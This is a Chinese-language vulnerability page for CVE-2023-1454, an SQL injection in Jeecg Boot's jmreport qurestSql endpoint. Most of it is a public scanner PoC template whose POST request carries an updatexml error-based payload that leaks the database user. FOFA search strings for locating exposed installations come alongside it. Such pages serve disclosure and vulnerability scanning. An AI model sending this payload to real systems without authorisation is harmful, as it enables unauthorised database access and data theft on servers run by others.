CVE-2023-1454: Jeecg Boot QuerySql sql injection

日期: 2025-09-01 | 影响软件: Jeecg Boot | POC: 已公开

漏洞描述

JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。JeecgBoot qurestSql处存在SQL注入漏洞,攻击者可以从其中获取数据库权限。 FOFA: "jeecg-boot" FOFA: app="JeecgBoot-企业级低代码平台"

PoC代码[已公开]

id: CVE-2023-1454

info:
  name: Jeecg Boot QuerySql sql injection
  author: zan8in
  severity: high
  verified: true
  description: |
    JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。JeecgBoot qurestSql处存在SQL注入漏洞,攻击者可以从其中获取数据库权限。
    FOFA: "jeecg-boot"
    FOFA: app="JeecgBoot-企业级低代码平台"
  reference:
    - https://mp.weixin.qq.com/s/8lub-Nr9X7UUCTnUVoYQ7Q

rules:
  r0:
    request:
      method: POST
      path: /jeecg-boot/jmreport/qurestSql
      headers:
        Content-Type: application/json;charset=UTF-8
      body: |
        {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
    expression: response.status == 200 && response.body.bcontains(b'XPATH syntax error') 
expression: r0()

相关漏洞推荐